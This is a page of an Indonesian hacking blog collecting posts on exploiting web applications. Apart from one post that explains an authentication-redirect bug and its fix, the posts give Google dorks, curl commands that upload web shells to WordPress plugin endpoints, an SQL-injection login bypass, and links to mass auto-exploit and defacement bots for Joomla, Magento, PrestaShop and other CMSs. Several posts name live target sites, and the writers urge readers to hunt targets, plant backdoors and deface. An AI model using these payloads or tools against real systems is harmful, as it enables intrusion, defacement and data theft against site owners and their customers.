Codes Xploit: exploit
Pages
Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

 
Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload

 

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Powered By Nusiorung - Bypassing Admin Login

 

Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #




Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.



Setelah itu, klik kotak pada bagian bawah


Langsung upload shell kita disini



Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )


Selanjutnya, letak shell kalian ada di:
-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 
http://edu.nmc.ac.th/th/admin/


Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

PHPMailer 5.2.18 Remote Code Execution

 
Baru baru ini ditemukan kerentanan pada PHPMailer yang memungkinkan attacker mendapatkan akses ke server melalui Remote Code Execution (RCE). PHPMailer sendiri merupakan salah satu library open source PHP populer untuk mengirim email. Dan saat ini sudah tercatat sudah digunakan oleh lebih dari 9 juta user di seluruh dunia.
Read More

Prestashop Module Blocktestimonial File Upload

 

[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )


Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya
Oke Sekian dulu, happy hacking :D
NB: Sumber tertera diatas


Brutal - Toolkit For Keystroke Injection With Teensy

 
Ya kali ini kita akan membahas HID (Human Interfaes Device) attack yang kaya rubber ducky itu yang dibuat Darren Kitchen. HID attack itu adalah waktu kita colokin device ini ke laptop atau komputer dia akan ke detect jadi keyboard mouse josytick . Kalian yang sudah mengikuti Mr.Robot dan menyimak adegan dimana Angela mencolokkan usb ke komputer untuk mendapatkan informasi penting, nah itulah yang akan kita bahas sekarang, HID-Attack.
Read More

Bot Auto Tusbol Hosting Nazuka

 
Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha :D .
Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.
Untuk script nya bisa download disini :
Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro :)
Oh iya, disini ada beberapa parameter yang harus diubah.
$zh = "zafk1el"; 
Itu nick zone-h. Silahkan diganti sendiri ya.
Lalu bagian 
$isi_nama_doang = 
Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.
Cara pakainya gimana bang ?
Gampang banget. 
Tinggal masukkan perintah
php namafile.php
Lalu enter. Selanjutnya masukkan bing dork nya.
PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 
Thanks.

BBQSQL - Tool Untuk Eksploitasi Blind SQL Injection

 
BBQSQL adalah alat yang dapat digunakan untuk membantu eksekusi ketika kalian melakukan audit server dan menemukan celah Blind SQL. Tool ini merupakan blind SQL injection framework yang ditulis menggunakan bahasa python. BBQSQL juga merupakan alat semi-otomatis, yang memungkinkan sedikit kustomisasi.
Read More

Dirty COW - Linux Kernel Exploit

 
Celah cukup berbahaya pada kernel Linux baru saja ditemukan. Nama COW sendiri berasal dari mekanisme copy-on-write (COW) dalam kernel Linux, yang mana exploit ini sendiri memungkinkan "unprivileged" user untuk memodifikasi file yang sifatnya read only.
Read More

Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password

 
Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.
Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe

Oke Langsung aja ini dia penampakan tools nya: [ CLI ]


[ Web Based ]



Cara Pake: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/
- bukalah cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut ( web.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/


LINK [ CLI ] -> http://pastebin.com/sPpJRjCZ
LINK [ Web Based ] -> http://pastebin.com/0STXanAx

mudah bukan? hehehe.
Oke Sekian dulu, selamat malamm ^^

Bypassing Connection Reset while Uploading Shell on OJS Xploit

 
Selamat Malam gaannnnn, di malem minggu yang suram karena disini hujan :v gua hadir lagi ngasih tutor yang bermanfaat nih buat kalian para defacer.
daripada pacaran :v mending kesini gannn :p

Oke gausah banyak bacot , kita langsung aja ke tutorial :D
Sesuai judul postingan ini, kalian para defacer khususnya para OJS (Open Journal System) Hunter pasti pernah ngalamin hal ini kan?
Disini gua akan bahas tutorial bypassnya gann :D
Simak Baik-baik :D

1. Siapin Live Target kalian, disini gua udah dapet Live Targetnya dan siap-siap untuk upload shell (.phtml) ekstensinya.


Lalu disini gua lansung upload aja shell nya....

Tapi, liat apa yang terjadi setelah gua upload! .........

BOOM~ wwkkwkw ternyata, Connection Reset. gua kira ini emang koneksi gua awalnya yang agak ngadat (padahal koneksi lancar)
Nahh, iseng" gua nyoba (karena gua ga cek-cek google dulu pas pgn cari bypass cara upload shellnya) . Disini gua coba bypass dengan tamper data.
Dan ........
Akhirnya berhasil gannnn.

2. Step ke 2, kita mulai tutor bypass nya.
=> Siapin Shell kalian dengan ekstensi .cer (contoh: shell_kalian.cer)

=> Aktifkan Add-Ons "Tamper Data" nya dengan Klik "Start Tamper".

=> Klik "Upload"" untuk upload shell kalian.
Nah, dibagian ini, kalian akan melihat "pop-up window" dari Tamper Datanya, Klik "Tamper".

=> Setelah itu, kalian akan melihat Pop-up Request Parameter, dan Post Parameter dari Tamper datanya.
pada bagian ini, kalian lihat pada bagian box di kanan (post parameter), cari lah nama file kalian disana dan edit lah bagian itu menjadi (shell_kalian.cer.phtml)

=> Lalu, Klik "OK".
=> Dan....... BOOM !!!!! Lihat ? Sukses Terupload dengan eksetensi .phtml, padahal jika kita upload polosan tanpa bypass , ektensi .phtml akan menghasilkan "Connection Reset" seperti pada awal masalah kita :D.

3. Selanjutnya, untuk menemukan Shell Backdoor Kalian, IndoXploit sudah Menyiapkan Tools untuk memudahkan kalian mencari Shell Backdoor yang kalian upload Khusus untuk exploit OJS ini.
LINK TOOLS: http://pastebin.com/r4k1cPs8
=> Jalankan di Terminal/CMD
usage: php namafile.php http://target-ojs.com/ nama-shell-kalian.phtml

Tunggu dan Lihat Hasilnyaa....... :D

Okee sekian dulu gaysss, semoga tutornya bermanfaat :D
Silakan Sumber jika ingin copas :D

Tutorial by: Mr. Error 404
Greetz: IndoXploit - Sanjungan Jiwa

Magento Bot with Bing Dorker

 
Assalamualaikum, selamat malam gannnn......
Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v

Okee gausah panjang lebar, dalam kesempatan kali ini gua pgn share sebuah tools untuk para Logger yang doyan mainan magento buat cari cc dll :v.

Ini dia penampakan toolsnya:

Tools ini sudah dibuat sedimikian rupa dan pastinya enak dipake :v aman gaada logger karena gua share secara [open source] :).
Dalam tools ini, gua menggabungkan beberapa tools sekaligus + membuatnya semakin mudah dengan memakai Bing Dorker. ( duduk tenang aja gannn, masukin dork -> tunggu mangsa hehehehe :D ).

fitur:
- Magento Add Admin Xploit
=> detect filesystem
=> detect downloader+permission
=> get info average order,lifetime sales,quantity order
=> get info total customers
=> get info installed packages.
- Magento Webforms Xploit

Link-> http://pastebin.com/aGh7w1Ub

*NB: usage: php namafile.php 'bing_dorker'
*NB: php magento.php '"/customer/account/login" site:it'
*NB: $shell = "id.php"; // ganti id.php dengan shell kalian yang berada dalam 1 Folder dengan tools ini *NB: INGET DISINI KITA PAKE DORK BING, BUKAN GOOGLE DORK!!!
dalam tools ini, result target yang berhasil di exploit tidak otomatis tersimpan dalam sebuah file.txt, jadi kalian harus cek 1 1 target kalian yang berhasil di exploit di Terminal/CMD nya langsung. ( maaf gan, ga kepikiran , keburu di publish wkwkw )

Oke sekian duluuu,
Thanks to: Mr. Magnom ( for bing dorker )
Greetz: IndoXploit - Sanjungan Jiwa - Jloyal - Jancok Sec - Res7ock Crew

Full Bot Deface Website

 


Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..

Cara kerja tools ini ialah dengan mengambil nama domain dari web mirror zone-deface.com, abis itu dapetin ip-nya. nah ipnya kita scan deh di bing. Abis itu kita grab lagi dan kita scan cms apa yg dipakai, terus di save sesuai cmsnya dan di eksploitasi sesuai cms-nya.

Tapi disini gw cuma ada exploit com_media, jce, jdownloads..
untuk yg laen lu cari sendiri ya.

Download Tools disini.
https://drive.google.com/file/d/0B4_2Vn34hkX1V1JYcDFXSlZ2VzQ/view?usp=sharing

command:
php ambil.php attacker_Tu5b0l3d 72 && perl setan.pl ip.htm 31 && php detek.php target_setan.htm && php exploit.php 1-Joomla.htm

catatan:
72 itu ialah page akhir dari attacker_Tu5b0l3d
sesuain sama attacker/team yg mau di grab di http://zone-deface.com/

31 itu page paling akhir pas scan di bing.
klo mau scan sampe 50 page, ubah jadi 51

exploit.php itu isinya ada exploit com_media, jce, jdownloads.
ganti di k.txt dan k.png,
pkoknya harus ada kata - kata hacked.
ganti juga nick di zone-h

1-Joomla.htm itu list joomla site.

Video:
https://www.youtube.com/watch?v=GTocBpZ8eXM

##.
Thx buat bang fyelix yang udah ngasih VPS.

https://www.facebook.com/groups/indoxploitpublic/

Joomla Component com_jwallpapers Arbitrary File Upload

 
==================================================================
Title: Joomla Component com_jwallpapers Arbitrary File Upload
Author: Mr. Error 404 - IndoXploit
Google Dork: inurl:/index.php?option=com_jwallpapers
vuln: /index.php?option=com_jwallpapers&task=upload
output vuln: {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Thanks to: ./Mister-Y404 & All Member IndoXploit
Greetz: Sanjungan Jiwa - Defacer Tersakiti Team
==================================================================

CSRF Xploit Code:
-> http://pastebin.com/2YenMhz3


NB: Ubah bagian shell_kalian.php dengan nama shell yang kalian ingin kan ( ex: shell.php ), dan juga shell yang kalian upload harus ber-extensi .jpg (ex: shell.jpg). Tanpa haarus menggunakan tamper data dan sebagainyaa.

Setelah Kalian Xploit, maka hasilnya akan tetap sama seperti ini:


tidak ada tulisan error sama sekali.
Shell akses: http://target.com/jwallpapers_files/plupload/shell_kalian.php

Popoji CMS Auto Xploiter

 
Okeee lagi-lagi masih dalam exploit popoji cms, kali ini gua akan mengembangkan lagi exploit terdahulunyaaa.
Yappp, kali ini mungkin akan sangat mudahhhhhh sekaliii bagi kalian para penikmat bot instann :v

oke gaperlu panjang lebarrr



Fitur:
- Auto Upload Shell Backdoor [ indoxploit shell ]
- Auto Get Nama Shell Kalian [ kalo dir nya forbidden/udah di tebas indexnya, nanti muncul pemberitahuannya *cek ss]
- Auto Deface .

Cara Pakai:
1. Masukan target kalian yang sudah dalam keadaan telah ter-aktivasi, artinyaa akun sudah dapat digunakan .
buatlah sebuah file.txt yang berisi kumpulan target kalian nantinyaa. disusuh rapih kebawah, contoh:
http://target1.com/
http://target2.com/
http://target3.com/
http://target4.com/

2. Letakan semuanya dalam 1 folder yang sama.
3. Di-wajibkan harus memakai IndoXploit Shell !!!! jgn diganti nanti error tanggung sendiri.
4. petunjuk pemakaian sudah tertera dalam toolsnyaa.
ex: php exploiter.php list_target.txt shell.jpg shell.php deface.html
5. Happy Hacking ^_^

colong disini gann exploiternyaaa -> http://pastebin.com/xtdNLkjM
Shell indoxploit -> http://www.indoxploit.or.id/2016/05/indoxploit-shell-first-edition.html
Oke Sekiann duluu yaa gannnn, kalo kesusahaan tanya di grupp ajaaaa :D

POPOJI CMS Add Admin Auto Registration

 
Kyknyaa lagi fresh nih yaa exploit hahahahaaa.
okedeh gausah banyak bacott, kali ini gua akan share Tools yang memudahkan kalian untuk registrasion admin untuk POPOJI CMS.
okeee ini diaa bentuknyaaaaa.

Masukan Email kalian: [email harus valid, karena nantinya kode token aktivasi akan dikirim ke email kalian]
Masukin saja List target kalian: [ex: http://target.com/ / http://target.com/[path]] *tidak usah dengan /po-admin/ dan sebagainnyaa, cukup seperti contoh saja.

setelahh ituu klik Xploit dannnnnn........
dan tinggal nimatin hasilnyaa gannnnnn.

colong scriptnyaa disini gannn: http://pastebin.com/U1vZkBRy

cara pakai:
- upload script nya ke hosting/shell.
- masukan email dan target kalian.
- nikmatiinn ^_^


okee sekiann dulu, selamat berhacking riaaa ^_^
thanks to: TKJ Cyber Art - exploit author

WebDav Mass Xploiter V.2 [ Web Based ]

 
halooooo, udah lama ga coding lagi nihhh.
iseng-isengg, balik ngoding lagiii dan coba buat memperbagus sebuah tools yang sangat LEGEND banget nih. Yaitu Webdav Xploiter.
Yappp, siapa sih yang gatau dengan tools Webdav? Tools legend buatan salah satu tim hacker paling top dari indonesia yaitu Hmei7.

Kali ini akan gua perbagus sedikit, dalam tools ini kalian cukup upload-kan saja ke sebuah target kalian lalu buka filenyaa [ web based ]
contoh: web.com/webdav.php

Disana ada 2 buah field, yang pertama ada "file deface" dan "textarea yang berisi kumpulan target"
File deface isilah dengan nama file deface anda yang 1 folder dengan tools webdav ini. [ex: hack.html]
nahhhh yang istimewa dari tools ini adalahhhhhh..........................

Yapp, kalian sudah bisa tebak sendiri. Target di dalam textarea tersebut sudah otomatis terisi dengan sendirinyaaa. darimana datangnyaa? dari hasil reverse ip otomatis yang sudah kita buat sedemikian rupaa

Jadi pada saat kalian buka file webdav.php / exploiternyaaaa. kalian tinggal lansung isi kan file deface kaliann lalu langsung klik Xploit! saja tanpa haruss ribett cari target 1 1 lagiii.
NB: File deface kalian harus berisi kata-kata "hacked" [ex: hacked by indoxploit]

Jika berhasil di exploit [cek ss]:

Colong scriptnya disini: http://adf.ly/1cj5GK
Okeee sekiann duluuu yaaaaa, happy hacking ^^ .

Auto Exploiter WebDav PHP

 

Auto Exploiter WebDav thx to @Aderoot

Tool webdav yang terkenal yaitu toolnya hmei7, tapi kali ini ane pengen share tool webdav versi php.

script:
http://pastebin.com/eTmsR6JA

video:
https://www.youtube.com/watch?v=LXmfzEVM0mM

bagi yang belum tau cara menjalankannya.
cek cara menjalankan exploiter php

yuk join!
https://www.facebook.com/groups/indoxploitpublic/

keep share.

PrestaShop Auto Deface by iDx

 
Dalam zip ini, udah ada exploiter,doc root,shell idx.
dan didalam source exploiternyaa, sudah ada penjelasan, file" apa yang boleh diganti dan tidak diganti, selebihnya harap ikutin code yang ada , daripada nantinya error, tanggung sendiri:p

fitur:
- auto tanem backdoor
- auto deface
- hasil nya ke simpen dalam "hasil.txt", taro semuanya dalam 1 folder yang sama ( CLI version ) jalankan lewat cmd/terminal/vps
Cara Pake:
* masukan seluruh target anda ( full url: http://www.target.com/path/path/path/uploadimage.php ) ke dalam sebuah file.txt. * lalu jalankan cmd pada terminal seperti pada gambar diatas.

format target. ( dalam file.txt )
http://www.target1.com/path/path/path/uploadimage.php
http://www.target2.com/path/path/path/uploadimage.php
http://www.target3.com/path/path/path/uploadimage.php
http://www.target4.com/path/path/path/uploadimage.php
http://www.target5.com/path/path/path/uploadimage.php

Download: http://adf.ly/1bWOfF

Okee sekiann duluuuu ^^

Thanks to: Author exploit, sanjungan jiwa
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.